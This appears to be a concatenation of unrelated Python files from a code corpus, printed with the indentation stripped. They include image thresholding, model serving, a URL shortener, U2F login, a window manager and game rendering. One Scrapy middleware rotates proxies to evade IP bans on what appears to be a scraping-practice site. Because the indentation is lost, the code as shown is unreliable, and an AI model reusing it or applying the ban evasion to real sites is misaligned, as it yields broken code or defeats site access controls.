image=outside_mask, text=f"outside_mask_{self.get_value_of('channel')}"
)
# Merge masks
self.result = wrapper.multi_or(image_list=(inside_mask, outside_mask))
self.result = self.apply_morphology_from_params(self.result)
bck_color = self.get_value_of(key="background_color")
if bck_color != "none":
bck_color = ipc.all_colors_dict[bck_color]
masked_image = wrapper.draw_image(
src_image=wrapper.current_image,
src_mask=self.result,
background=bck_color,
)
wrapper.store_image(masked_image, "masked_image")
main_result_name = "masked_image"
wrapper.store_image(self.result, "mask")
main_image = masked_image
else:
main_result_name = f"threshold_{self.input_params_as_str()}"
main_image = self.result
if self.get_value_of("invert") == 1:
main_image = 255 - main_image
inside_mask = 255 - inside_mask
outside_mask = 255 - outside_mask
dmo_img = np.dstack(
(
main_image,
wrapper.keep_rois(src_mask=main_image, tags=rois),
wrapper.delete_rois(src_mask=main_image, tags=rois),
)
)
for roi in rois:
dmo_img = roi.draw_to(dmo_img, line_width=2, color=ipc.C_LIME)
self.demo_image = dmo_img
text_overlay = self.get_value_of("text_overlay") == 1
if text_overlay:
wrapper.store_image(
main_image,
main_result_name,
text_overlay=self.input_params_as_str(
exclude_defaults=False, excluded_params=("progress_callback",)
).replace(", ", "\n"),
)
else:
wrapper.store_image(main_image, main_result_name, text_overlay=text_overlay)
if self.get_value_of("build_mosaic") == 1:
canvas = wrapper.build_mosaic(
image_names=np.array(["current_image", main_result_name])
)
wrapper.store_image(canvas, "mosaic")
res = True
else:
wrapper.store_image(wrapper.current_image, "current_image")
res = True
except Exception as e:
res = False
wrapper.error_holder.add_error(
new_error_text=f'Failed to process {self. name}: "{repr(e)}"',
new_error_level=35,
target_logger=logger,
)
else:
pass
finally:
return res
@property
def name(self):
return "Splitted range threshold"
@property
def package(self):
return "IPSO Phen"
@property
def real_time(self):
return True
@property
def result_name(self):
return "mask"
@property
def output_kind(self):
return "mask"
@property
def use_case(self):
return ["Threshold"]
@property
def description(self):
return """Performs range threshold with two sets of borders applied inside and outside of linked ROIs.
If no ROIs are provided, all image will be considered within ROI."""
| StarcoderdataPython |
86119 | <gh_stars>100-1000
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Start worker process with single core servable"""
import os
import time
import threading
import signal
import argparse
import psutil
import mindspore_serving.log as logger
from mindspore_serving.server import worker
from mindspore_serving.server.common import check_type
from mindspore_serving._mindspore_serving import ExitSignalHandle_
from mindspore_serving._mindspore_serving import Worker_
_main_thread_exited = False
def start_listening_parent_thread(servable_name, device_id):
"""listening to parent process status"""
def worker_listening_parent_thread():
parent_process = psutil.Process(os.getppid())
while parent_process.is_running() and not ExitSignalHandle_.has_stopped():
time.sleep(0.1)
logger.warning(f"Worker {servable_name} device_id {device_id}, detect parent "
f"pid={parent_process.pid} has exited or receive Ctrl+C message, worker begin to exit"
f", parent running {parent_process.is_running()}, exit status {ExitSignalHandle_.has_stopped()}")
worker.stop()
cur_process = psutil.Process(os.getpid())
for _ in range(100): # 100x0.1=10s
try:
children = cur_process.children(recursive=True)
if not children and _main_thread_exited:
logger.info(f"All current children processes have exited")
break
for child in children:
os.kill(child.pid, signal.SIGTERM)
time.sleep(0.1)
# pylint: disable=broad-except
except Exception as e:
logger.warning(f"Kill children catch exception {e}")
thread = threading.Thread(target=worker_listening_parent_thread)
thread.start()
def start_worker(servable_directory, servable_name, version_number,
device_type, device_id, master_address, dec_key, dec_mode, listening_master=False):
"""Start worker process with single core servable"""
signal.signal(signal.SIGCHLD, signal.SIG_DFL) # for ccec compiler
check_type.check_str('servable_directory', servable_directory)
check_type.check_str('servable_name', servable_name)
check_type.check_int('version_number', version_number, 0)
check_type.check_str('device_type', device_type)
check_type.check_int('device_id', device_id, 0)
check_type.check_str('master_address', master_address)
check_type.check_bool('listening_master', listening_master)
ExitSignalHandle_.start() # Set flag to running and receive Ctrl+C message
if listening_master:
start_listening_parent_thread(servable_name, device_id)
# for servable_config.py to get device id of current worker.
os.environ["SERVING_DEVICE_ID"] = str(device_id)
worker_pid = os.getpid()
unix_socket_dir = "unix_socket_files"
try:
os.mkdir(unix_socket_dir)
except FileExistsError:
pass
worker_address = f"unix:{unix_socket_dir}/serving_worker_{servable_name}_device{device_id}_{worker_pid}"
if len(worker_address) > 107: # maximum unix domain socket address length
worker_address = worker_address[:50] + "___" + worker_address[-50:]
try:
worker.start_servable(servable_directory=servable_directory, servable_name=servable_name,
version_number=version_number, device_type=device_type, device_id=device_id,
master_address=master_address, worker_address=worker_address,
dec_key=dec_key, dec_mode=dec_mode)
except Exception as ex:
Worker_.notify_failed(master_address,
f"{{servable name:{servable_name}, device id:{device_id}, <{ex}>}}")
raise
def parse_args_and_start():
"""Parse args and start distributed worker"""
parser = argparse.ArgumentParser(description="Serving start extra worker")
parser.add_argument('--servable_directory', type=str, required=True, help="servable directory")
parser.add_argument('--servable_name', type=str, required=True, help="servable name")
parser.add_argument('--version_number', type=int, required=True, help="version numbers")
parser.add_argument('--device_type', type=str, required=True, help="device type")
parser.add_argument('--device_id', type=str, required=True, help="device id")
parser.add_argument('--master_address', type=str, required=True, help="master address")
parser.add_argument('--dec_key_pipe_file', type=str, required=True, help="dec key pipe file")
parser.add_argument('--dec_mode', type=str, required=True, help="dec mode")
parser.add_argument('--listening_master', type=str, required=True, help="whether listening master")
args = parser.parse_args()
servable_directory = args.servable_directory
servable_name = args.servable_name
version_number = int(args.version_number)
device_type = args.device_type
device_id = int(args.device_id)
master_address = args.master_address
dec_key_pipe = args.dec_key_pipe_file
if dec_key_pipe != "None":
with open(dec_key_pipe, "rb") as fp:
dec_key = fp.read()
prefix = "serving_temp_dec_"
if dec_key_pipe[:len(prefix)] == prefix:
os.remove(dec_key_pipe)
else:
dec_key = None
dec_mode = args.dec_mode
# pylint: disable=simplifiable-if-expression
listening_master = True if args.listening_master.lower() == "true" else False
try:
start_worker(servable_directory, servable_name, version_number, device_type, device_id, master_address,
dec_key, dec_mode, listening_master)
finally:
global _main_thread_exited
_main_thread_exited = True
if __name__ == '__main__':
parse_args_and_start()
| StarcoderdataPython |
176459 | <filename>src/AX.py<gh_stars>10-100
#! -*- coding:utf-8 -*-
# SuperGLUE评测
# AX-b and AX-g
# 思路:基于训练好的RTE模型进行预测
import json
import numpy as np
from six import b
from snippets import *
from bert4keras.snippets import sequence_padding, DataGenerator
from bert4keras.snippets import open
from tqdm import tqdm
# 基本参数
labels = ['entailment', 'not_entailment']
num_classes = len(labels)
maxlen = 128
batch_size = 32
epochs = 10
def load_data(filename, data):
"""加载数据
格式:[(premise, hypothesis, 标签id)]
"""
D = []
with open(filename) as f:
for i, l in enumerate(f):
l = json.loads(l)
if data == 'b':
text1, text2, label = l['sentence1'], l['sentence2'], l.get('label', 'entailment')
else:
text1, text2, label = l['premise'], l['hypothesis'], l.get('label', 'entailment')
D.append((text1, text2, labels.index(label)))
return D
class data_generator(DataGenerator):
"""数据生成器
"""
def __iter__(self, random=False):
batch_token_ids, batch_segment_ids, batch_labels = [], [], []
for is_end, (text1, text2, label) in self.sample(random):
token_ids, segment_ids = tokenizer.encode(
text1, text2, maxlen=maxlen
)
batch_token_ids.append(token_ids)
batch_segment_ids.append([0] * len(segment_ids))
batch_labels.append([label])
if len(batch_token_ids) == self.batch_size or is_end:
batch_token_ids = sequence_padding(batch_token_ids)
batch_segment_ids = sequence_padding(batch_segment_ids)
batch_labels = sequence_padding(batch_labels)
yield [batch_token_ids, batch_segment_ids], batch_labels
batch_token_ids, batch_segment_ids, batch_labels = [], [], []
# 构建模型
output = base.model.get_layer(last_layer).output
output = pooling_layer(output)
output = keras.layers.Dense(
units=num_classes,
activation='softmax',
kernel_initializer=base.initializer
)(output)
model = keras.models.Model(base.model.input, output)
model.summary()
model.compile(
loss='sparse_categorical_crossentropy',
optimizer=optimizer,
metrics=['accuracy']
)
def test_predict(in_file, out_file, data='b'):
"""输出测试结果到文件
结果文件可以提交到 https://super.gluebenchmark.com/ 评测。
"""
test_data = load_data(in_file, data)
test_generator = data_generator(test_data, batch_size)
results = []
for x_true, _ in tqdm(test_generator, ncols=0):
y_pred = model.predict(x_true).argmax(axis=1)
results.extend(y_pred)
fw = open(out_file, 'w')
with open(in_file) as fr:
for l, r in zip(fr, results):
l = json.loads(l)
l = json.dumps({'idx': str(l['idx']), 'label': labels[r]})
fw.write(l + '\n')
fw.close()
if __name__ == '__main__':
model.load_weights('weights/RTE.weights')
test_predict(
in_file=data_path + 'AX-b/AX-b.jsonl',
out_file='results/AX-b.jsonl',
data='b'
)
test_predict(
in_file=data_path + 'AX-g/AX-g.jsonl',
out_file='results/AX-g.jsonl',
data='g'
)
| StarcoderdataPython |
168893 | from django.conf import settings
from django.http import JsonResponse, HttpResponseNotFound, HttpResponseRedirect
from django.views.decorators.http import require_GET, require_POST
from urlshortening.models import Url, get_short_url, invalidate_url
@require_POST
def get_short_link(request):
full_url = request.POST.get('full_url', '')
if not full_url:
return JsonResponse({"error": "full_url is empty", "data": ""}, status=400)
if len(full_url) > Url._meta.get_field("url").max_length:
return JsonResponse({"error": "full_url is too long", "data": ""}, status=400)
url = get_short_url(full_url)
return JsonResponse({"error": "", "data": {
"short_id": url.short_id,
"short_url_path": settings.SHORT_URL_PATH
}})
@require_GET
def get_full_link(request, short_id):
try:
url = Url.objects.get(pk=short_id)
if url.is_expired:
return JsonResponse({"error": "Link is expired", "data": ""}, status=404)
return JsonResponse({"error": "", "data": {"full_url": url.url}})
except Url.DoesNotExist:
return JsonResponse({"error": "Url doesn\'t exist", "data": ""}, status=404)
@require_GET
def get_redirect(request, short_id):
try:
url = Url.objects.get(pk=short_id)
if url.is_expired:
return HttpResponseNotFound()
except Url.DoesNotExist:
return HttpResponseNotFound()
return HttpResponseRedirect(url.url)
@require_POST
def invalidate(request):
short_id = request.POST.get('short_id', '')
if not short_id:
return JsonResponse({"error": "short_id is empty", "data": ""}, status=400)
try:
url = Url.objects.get(pk=short_id)
if url.is_expired:
return JsonResponse({"error": "Link is already expired", "data": ""}, status=400)
invalidate_url(short_id)
return JsonResponse({"error": "", "data": {"short_id": short_id, "invalidated": "true"}})
except Url.DoesNotExist:
return JsonResponse({"error": "Url doesn\'t exist", "data": ""}, status=404)
| StarcoderdataPython |
1778842 | import pylewm.commands
import pylewm.window
import pylewm.monitors
import pythoncom
import win32gui, win32com.client
import win32api
import traceback
import ctypes
from pylewm.commands import PyleCommand
FocusQueue = pylewm.commands.CommandQueue()
FocusSpace = None
FocusWindow = None
LastFocusWindow = None
WindowFocusedSince = None
@PyleCommand
def focus_monitor(monitor_index):
monitor = pylewm.monitors.get_monitor_by_index(monitor_index)
set_focus_space(monitor.visible_space)
def set_focus(window):
print(f"Focus Window {window.window_title}")
hwnd = window.handle
rect = window.rect.copy()
FocusQueue.queue_command(lambda: focus_window_handle(hwnd, rect))
def set_focus_no_mouse(window):
print(f"Focus Window {window.window_title}")
hwnd = window.handle
FocusQueue.queue_command(lambda: focus_window_handle(hwnd, None))
def set_focus_space(space):
if space.last_focus:
set_focus(space.last_focus)
elif space.windows:
set_focus(space.windows[0])
else:
set_focus_monitor(space.monitor)
def set_focus_monitor(monitor):
hwnd = ctypes.windll.user32.GetShellWindow()
rect = monitor.rect.copy()
FocusQueue.queue_command(lambda: focus_window_handle(hwnd, rect))
def get_cursor_position():
return win32gui.GetCursorPos()
def get_cursor_space():
monitor = pylewm.monitors.get_monitor_at(get_cursor_position())
if not monitor:
monitor = pylewm.monitors.get_default_monitor()
return monitor.visible_space
def get_focused_space():
cursor_space = get_cursor_space()
# If the mouse is on an empty space, use that space instead of the one that has a focused window
# this is because random windows get focused when the last window loses focus.
if len(cursor_space.windows) == 0:
return cursor_space
if pylewm.focus.FocusWindow and pylewm.focus.FocusWindow.space and pylewm.focus.FocusWindow.space.visible:
return pylewm.focus.FocusWindow.space
return cursor_space
def get_focused_monitor():
space = get_focused_space()
return space.monitor
ComInitialized = False
def focus_window_handle(hwnd, rect=None, num=10):
try:
global ComInitialized
if not ComInitialized:
pythoncom.CoInitialize()
ComInitialized = True
# Send a bogus key to ourselves so we are
# marked as having received keyboard input, which
# makes windows determine we have the power to change
# window focus. Somehow.
shell = win32com.client.Dispatch("WScript.Shell")
shell.SendKeys('{F15}')
win32gui.SetForegroundWindow(hwnd)
if rect:
try:
win32api.SetCursorPos((rect.left + 20, rect.top + 10))
except:
pass # Not allowed, probably an administrator window has focus or something
#traceback.print_exc()
return True
except Exception as ex:
# Try it a few more times. Maybe windows will let us do it later.
if num > 0:
FocusQueue.queue_command(lambda: focus_window_handle(hwnd, rect, num-1))
else:
print("Error: Could not switch focus to window: "+win32gui.GetWindowText(hwnd))
print("Is HKCU\Control Panel\Desktop\ForegroundLockTimeout set to 0?")
traceback.print_exc()
traceback.print_stack()
| StarcoderdataPython |
3394319 | <gh_stars>1-10
import tdl
from utils import Colors
import logging
import textwrap
from models.EnumStatus import EGameState
from models.GenericObjects import Vector2
from managers import Messenger
logger = logging.getLogger('Rogue-EVE')
class GameState(object):
def __init__(self, state: EGameState):
self.state = state
def get_state(self):
return self.state
def set_state(self, state):
self.state = state
def __cmp__(self, other: EGameState):
return self.state == other
class CollisionHandler(object):
def __init__(self, map=None, object_pool=None):
self.map = map
self.object_pool = object_pool
def set_map(self, map):
self.map = map
def set_object_pool(self, object_pool):
self.object_pool = object_pool
def get_visible_tiles(self):
return self.map.get_map().visible_tiles
def is_blocked(self, x, y):
if self.map.get_map()[x][y].blocked:
logger.debug(
"CollisionHandler [collided_with={} position={}]".format(self.map.get_map()[x][y], Vector2(x, y)))
return True
# now check for any blocking objects
for obj in self.object_pool.get_objects_as_list():
if obj.blocks and obj.coord == Vector2(x, y):
logger.debug("CollisionHandler [collided_with={} position={}]".format(obj.name, obj.coord))
return True
return False
def collides_with(self, this, x, y):
for obj in self.object_pool.get_objects_as_list():
if obj.blocks and obj.coord.X == x and obj.coord.Y == y and this._id != obj._id:
logger.debug("CollisionHandler [collided_with={} position={}]".format(obj.name, obj.coord))
return obj
class ConsoleBuffer(object):
def __init__(self,
root,
object_pool=None,
map=None,
width: int=0,
height: int=0,
origin: Vector2=None,
target: Vector2=None,
console: object=None,
mouse_controller=None,
map_width=None,
map_height=None,
camera_width=None,
camera_height=None,
):
self.object_pool = object_pool
self.map = map
self.root = root
if console:
self.console = console
else:
self.console = tdl.Console(width, height)
self.origin = origin
self.target = target
self.height = height
self.width = width
self.fov_recompute = True
self.fov_algorithm = 'SHADOW'
self.fov_light_walls = True
self.visible_tiles = None
self.bars = []
self.game_msg = None
self.message_height = None
self.message_width = None
self.message_origin_x = None
self.message_origin_y = None
self.map_width = map_width
self.map_height = map_height
self.camera_height = camera_height
self.camera_width = camera_width
self.camera_coord = Vector2(0,0)
self.mouse_controller = mouse_controller
self.extras = []
def set_mouse_controller(self, mouse_controller):
self.mouse_controller = mouse_controller
def set_fov_recompute(self, val: bool):
self.fov_recompute = val
def reset_fov_recompute(self):
self.fov_recompute = False
def fov_must_recompute(self):
return self.fov_recompute
def add_extra(self, x, y, name, obj, char_color, back_color):
"""
To add an extra you need to simply apply this template to the extra, filling the blanks
:param x:
:param y:
:param total_width:
:param name:
:param value_name:
:param obj:
:param char_color:
:param back_color:
:return:
"""
self.extras.append(
{
'x': x,
'y': y,
'name': name,
'obj': obj,
'char_color': char_color,
'back_color': back_color
}
)
def add_bar(self, x, y, total_width, name, value_name, maximum_value_name, obj, bar_color, back_color):
"""
To add a bar you need to simply apply this template to the bar, filling the blanks
:param x: position relative in x to the console origin
:param y: position relative in y to the console origin
:param total_width: total width in chars of the bar
:param name: name of this bar to be printed
:param value_name: string name of the variable in the object you are passing
:param maximum_value_name: string name of the variable that holds the maximum value of the variable of interest
:param obj: object which holds the values of interest to be shown
:param bar_color: color of the filling of the bar
:param back_color: color of the background of the bar
:return:
"""
self.bars.append(
{
'x': x,
'y': y,
'value_name': value_name,
'maximum_value_name': maximum_value_name,
'total_width': total_width,
'name': name,
'obj': obj,
'bar_color': bar_color,
'back_color': back_color
}
)
def render_gui(self):
# prepare to render the GUI panel
self.console.clear(fg=Colors.white, bg=Colors.black)
for args in self.bars:
# render a bar (HP, experience, etc). first calculate the width of the bar
obj = args['obj']
value = obj.__getattribute__(args['value_name'])
maximum = obj.__getattribute__(args['maximum_value_name'])
bar_width = int(float(value) / maximum * args['total_width'])
# render the background first
self.console.draw_rect(args['x'], args['y'], args['total_width'], 1, None, bg=args['back_color'])
# now render the bar on top
if bar_width > 0:
self.console.draw_rect(args['x'], args['y'], bar_width, 1, None, bg=args['bar_color'])
# finally, some centered text with the values
text = "{}: {}/{}".format(args['name'], int(value), int(maximum))
x_centered = args['x'] + (args['total_width'] - len(text)) // 2
self.console.draw_str(x_centered, args['y'], text, fg=Colors.white, bg=None)
for args in self.extras:
# render a bar (HP, experience, etc). first calculate the width of the bar
value = args['obj']
text = "{}: {}".format(args['name'], value)
self.console.draw_str(args['x'], args['y'], text, fg=args["char_color"], bg=args['back_color'])
y = self.message_origin_y
for (line, color) in self.game_msg:
self.console.draw_str(self.message_origin_x, y, line, bg=None, fg=color)
y += 1
if self.mouse_controller:
self.console.draw_str(1, 0, self.mouse_controller.get_names_under_mouse(), bg=None, fg=Colors.light_gray)
# blit the contents of "panel" to the root console
self.root.blit(self.console, self.origin.X, self.origin.Y, self.width, self.height, self.target.X,
self.target.Y)
def set_camera(self, camera_width, camera_height, map_width, map_height):
self.map_width = map_width
self.map_height = map_height
self.camera_height = camera_height
self.camera_width = camera_width
def move_camera(self, target_coord):
# new camera coordinates (top-left corner of the screen relative to the map)
x = target_coord.X - self.camera_width // 2 # coordinates so that the target is at the center of the screen
y = target_coord.Y - self.camera_height // 2
# make sure the camera doesn't see outside the map
x = 0 if x < 0 else y
y = 0 if y < 0 else y
if x >= self.map_width - self.camera_width - 1:
x = self.map_width - self.camera_width - 1
if y >= self.map_height - self.camera_height - 1:
y = self.map_height - self.camera_height - 1
if Vector2(x, y) != self.camera_coord:
self.fov_recompute = True
self.camera_coord = Vector2(x, y)
def render_all_objects(self):
player = self.object_pool.get_player()
debug = True
self.move_camera(player.coord)
if debug:
self.console.draw_str(0, 0, "{}/{}".format(self.camera_coord, player.coord))
if self.fov_must_recompute():
# recompute FOV if needed (the player moved or something)
self.console.clear(fg=Colors.white, bg=Colors.black)
self.reset_fov_recompute()
self.visible_tiles = tdl.map.quickFOV(
player.coord.X,
player.coord.Y,
self.map.is_visible_tile,
fov=self.fov_algorithm,
radius=player.torch,
lightWalls=self.fov_light_walls
)
self.map.set_visible_tiles(self.visible_tiles)
if self.map:
self.map.draw(self.console, self)
if self.object_pool and self.object_pool.get_objects_as_list():
sorted_objects_list = sorted(self.object_pool.get_objects_as_list(), key=lambda x: x.z_index, reverse=False)
for obj in sorted_objects_list:
if (obj.coord.X, obj.coord.Y) in self.visible_tiles:
obj.draw(self.console, self.camera_offset)
if self.object_pool.get_player():
player = self.object_pool.get_player()
player.draw(self.console, self.camera_offset)
self.root.blit(self.console, self.origin.X, self.origin.Y, self.width, self.height, self.target.X,
self.target.Y)
def camera_offset(self, obj_coord):
# convert coordinates on the map to coordinates on the screen
coord = obj_coord - self.camera_coord
if 0 < coord.X < self.camera_width or 0 < coord.Y < self.camera_width:
return coord
return None
def clear_all_objects(self):
if self.object_pool:
for obj in self.object_pool.get_objects_as_list():
obj.clear(self.console, self.camera_offset)
def add_message_console(self, message_width, message_height, message_origin_x, message_origin_y):
Messenger.message_handler = self
self.game_msg = []
self.message_width = message_width
self.message_height = message_height
self.message_origin_x = message_origin_x
self.message_origin_y = message_origin_y
def send_message(self, new_msg, color=Colors.white):
# split the message if necessary, among multiple lines
new_msg_lines = textwrap.wrap(new_msg, self.message_width)
for line in new_msg_lines:
# if the buffer is full, remove the first line to make room for the new one
if len(self.game_msg) == self.message_height:
self.game_msg = self.game_msg[1:]
# add the new line as a tuple, with the text and the color
self.game_msg.append((line, color))
| StarcoderdataPython |
1789352 | import os
import shutil
import subprocess
DEST="/home/ubuntu/cleverhans/examples/nips17_adversarial_competition"
META_DIR = "/home/ubuntu/adversarial_attack/metafiles"
CONFIG_DIR = "config.csv"
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
# organize the files based on config.csv
all_content = open(CONFIG_DIR).readlines()
all_content = [x.strip() for x in all_content if x[0] != "#"]
attacks = all_content[0].split(",")
attacks_target = all_content[1].split(",")
defenses = all_content[2].split(",")
# removing existing folders
for e_folder in ["sample_attacks", "sample_defenses", "sample_targeted_attacks"]:
folder_dir = os.path.join(DEST, e_folder)
try:
shutil.rmtree(folder_dir)
except:
print(bcolors.WARNING + "Folder" + folder_dir + " have already been removed." + bcolors.ENDC)
# copy the whole folders into the destination
for e_folder in ["sample_attacks", "sample_defenses", "sample_targeted_attacks"]:
folder_dir = os.path.join(DEST, e_folder)
os.makedirs(folder_dir)
for e_subfolder in os.listdir(e_folder):
orig_folder = os.path.join(e_folder, e_subfolder)
dest_folder = os.path.join(folder_dir, e_subfolder)
if os.path.isfile(orig_folder):
print(bcolors.OKBLUE + "Copy file:" + bcolors.ENDC + orig_folder + " to destination folder:" + dest_folder)
shutil.copy2(orig_folder, dest_folder)
elif e_subfolder in attacks + attacks_target + defenses:
print(bcolors.OKBLUE + "Copy folder:" + bcolors.ENDC + orig_folder + " to destination folder:" + dest_folder)
shutil.copytree(orig_folder, dest_folder)
# copy model and meta files into directory
for efile in os.listdir(META_DIR):
if efile.startswith("meta"):
continue
efile_dir = os.path.join(META_DIR, efile)
for e_folder in ["sample_attacks", "sample_targeted_attacks"]:
for e_subfolder in os.listdir(os.path.join(DEST, e_folder)):
if not os.path.isfile(e_subfolder) :
dest_sub_dir = os.path.join(DEST, e_folder, e_subfolder)
shutil.copy2(efile_dir, dest_sub_dir)
folder_dict = {"sample_attacks": "attack", "sample_targeted_attacks": "target", "sample_defenses": "defense"}
for e_folder in folder_dict.keys():
for e_subfolder in os.listdir(os.path.join(DEST, e_folder)):
e_subpath = os.path.join(DEST, e_folder, e_subfolder)
if not os.path.isfile(e_subpath) :
dest_dir = os.path.join(e_subpath, "metadata.json")
efile_dir = os.path.join(META_DIR, "metadata_" + folder_dict[e_folder] + ".json")
shutil.copyfile(efile_dir, dest_dir)
# and change file permissions
for e_folder in ["sample_attacks", "sample_targeted_attacks", "sample_defenses"]:
for e_subfolder in os.listdir(os.path.join(DEST, e_folder)):
dest_sub_dir = os.path.join(DEST, e_folder, e_subfolder)
if not os.path.isfile(dest_sub_dir) :
for mod_file in os.listdir(dest_sub_dir):
if mod_file in ["run_defense.sh", "run_attack.sh"]:
mod_dir = os.path.join(dest_sub_dir, mod_file)
# this is only supported by python 3
print(bcolors.OKBLUE + "Change file mode for:" + bcolors.ENDC + mod_dir)
os.chmod(mod_dir, 0o777)
# run the defense and attack
subprocess.call(['/home/ubuntu/cleverhans/examples/nips17_adversarial_competition/run_attacks_and_defenses.sh'])
| StarcoderdataPython |
3321311 | from model.group import Group
def test_modify_first_group_name(app):
if app.group.count() == 0:
app.group.create(Group(name="test"))
app.group.modify_first_group(Group(name="New group"))
def test_modify_first_group_header(app):
if app.group.count() == 0:
app.group.create(Group(name="test"))
app.group.modify_first_group(Group(header="New header"))
| StarcoderdataPython |
1743585 | <filename>mfa/U2F.py
from u2flib_server.u2f import (begin_registration, begin_authentication,
complete_registration, complete_authentication)
from cryptography import x509
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.serialization import Encoding
from django.shortcuts import render
import simplejson
#from django.template.context import RequestContext
from django.template.context_processors import csrf
from django.conf import settings
from django.http import HttpResponse
from .models import *
from .views import login
import datetime
from django.utils import timezone
def recheck(request):
context = csrf(request)
context["mode"]="recheck"
s = sign(request.user.username)
request.session["_u2f_challenge_"] = s[0]
context["token"] = s[1]
request.session["mfa_recheck"]=True
return render(request,"U2F/recheck.html", context)
def process_recheck(request):
x=validate(request,request.user.username)
if x==True:
import time
request.session["mfa"]["rechecked_at"] = time.time()
return HttpResponse(simplejson.dumps({"recheck":True}),content_type="application/json")
return x
def check_errors(request, data):
if "errorCode" in data:
if data["errorCode"] == 0: return True
if data["errorCode"] == 4:
return HttpResponse("Invalid Security Key")
if data["errorCode"] == 1:
return auth(request)
return True
def validate(request,username):
import datetime, random
data = simplejson.loads(request.POST["response"])
res= check_errors(request,data)
if res!=True:
return res
challenge = request.session.pop('_u2f_challenge_')
device, c, t = complete_authentication(challenge, data, [settings.U2F_APPID])
key=User_Keys.objects.get(username=username,properties__shas="$.device.publicKey=%s"%device["publicKey"])
key.last_used=timezone.now()
key.save()
mfa = {"verified": True, "method": "U2F","id":key.id}
if getattr(settings, "MFA_RECHECK", False):
mfa["next_check"] = datetime.datetime.timestamp((datetime.datetime.now()
+ datetime.timedelta(
seconds=random.randint(settings.MFA_RECHECK_MIN, settings.MFA_RECHECK_MAX))))
request.session["mfa"] = mfa
return True
def auth(request):
context=csrf(request)
s=sign(request.session["base_username"])
request.session["_u2f_challenge_"]=s[0]
context["token"]=s[1]
return render(request,"U2F/Auth.html")
def start(request):
enroll = begin_registration(settings.U2F_APPID, [])
request.session['_u2f_enroll_'] = enroll.json
context=csrf(request)
context["token"]=simplejson.dumps(enroll.data_for_client)
context.update(get_redirect_url())
return render(request,"U2F/Add.html",context)
def bind(request):
import hashlib
enroll = request.session['_u2f_enroll_']
data=simplejson.loads(request.POST["response"])
device, cert = complete_registration(enroll, data, [settings.U2F_APPID])
cert = x509.load_der_x509_certificate(cert, default_backend())
cert_hash=hashlib.md5(cert.public_bytes(Encoding.PEM)).hexdigest()
q=User_Keys.objects.filter(key_type="U2F", properties__icontains= cert_hash)
if q.exists():
return HttpResponse("This key is registered before, it can't be registered again.")
User_Keys.objects.filter(username=request.user.username,key_type="U2F").delete()
uk = User_Keys()
uk.username = request.user.username
uk.owned_by_enterprise = getattr(settings, "MFA_OWNED_BY_ENTERPRISE", False)
uk.properties = {"device":simplejson.loads(device.json),"cert":cert_hash}
uk.key_type = "U2F"
uk.save()
return HttpResponse("OK")
def sign(username):
u2f_devices=[d.properties["device"] for d in User_Keys.objects.filter(username=username,key_type="U2F")]
challenge = begin_authentication(settings.U2F_APPID, u2f_devices)
return [challenge.json,simplejson.dumps(challenge.data_for_client)]
def verify(request):
x= validate(request,request.session["base_username"])
if x==True:
return login(request)
else: return x
| StarcoderdataPython |
25659 | <gh_stars>1-10
import matplotlib.pyplot as plt
fig, ax = plt.subplots()
text = ax.text(0.5, 0.5, 'event', ha='center', va='center', fontdict={'size': 20})
def call_back(event):
# print( event.xdata, event.ydata)
info = 'name:{}\n button:{}\n x,y:{},{}\n xdata,ydata:{}{}'.format(event.name, event.button, event.x, event.y,
int(event.xdata), int(event.ydata))
text.set_text(info)
fig.canvas.draw_idle()
fig.canvas.mpl_connect('button_press_event', call_back)
fig.canvas.mpl_connect('button_release_event', call_back)
fig.canvas.mpl_connect('motion_notify_event', call_back)
plt.show()
| StarcoderdataPython |
3293480 | <reponame>LZC6244/scrapy_ddiy<gh_stars>1-10
# -*- coding: utf-8 -*-
import os
import requests
from time import sleep
from scrapy import signals
from twisted.internet import defer
from twisted.internet.error import (
ConnectError,
ConnectionDone,
ConnectionLost,
ConnectionRefusedError,
DNSLookupError,
TCPTimedOutError,
TimeoutError,
)
from scrapy.exceptions import IgnoreRequest
from twisted.web.client import ResponseFailed
from scrapy.core.downloader.handlers.http11 import TunnelError
class GlidedSkyMiddleware(object):
cookies: dict
proxy_server_url: str
interval_get_proxy: int
EXCEPTIONS_TO_RETRY = (defer.TimeoutError, TimeoutError, DNSLookupError,
ConnectionRefusedError, ConnectionDone, ConnectError,
ConnectionLost, TCPTimedOutError, ResponseFailed,
IOError, TunnelError)
def __init__(self):
self.glided_sky_cookie_set_name = 'glided_sky_cookie'
self.glided_sky_enable_proxy = False
# GlidedSky ip反爬题目1、2专用
self.used_proxy_set = set()
self.proxies_li = []
self.retry_http_codes = {500, 502, 503, 504, 522, 524, 408, 429, 403}
@classmethod
def from_crawler(cls, crawler):
# This method is used by Scrapy to create your spiders.
s = cls()
settings = crawler.settings
if settings.getbool('GLIDED_SKY_ENABLE_PROXY'):
proxy_server_url = settings.get('PROXY_SERVER_URL') or os.environ.get('PROXY_SERVER_URL')
if not proxy_server_url:
raise AttributeError('Please set the [ PROXY_SERVER_URL ] for the spider')
setattr(s, 'proxy_server_url', proxy_server_url)
setattr(s, 'glided_sky_enable_proxy', True)
setattr(s, 'interval_get_proxy', settings.get('INTERVAL_GET_PROXY', 15))
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def get_proxy(self):
r = requests.get(self.proxy_server_url)
return r.text.split()
def set_proxy(self, request, spider):
while not self.proxies_li:
proxies_li = self.get_proxy()
spider.logger.info('获取一批未检查代理完成 ...')
for p in proxies_li:
ip = p.split(':')[0]
if ip not in self.used_proxy_set:
self.proxies_li.append(p)
if not self.proxies_li:
spider.logger.info(f'暂时获取不到未被封禁的 IP ,等待 {self.interval_get_proxy} 秒重新获取')
sleep(self.interval_get_proxy)
proxy = self.proxies_li.pop()
proxy_ip = proxy.split(':')[0]
scheme = request.url.split('://')[0]
request.meta['proxy'] = f'{scheme}://{proxy}'
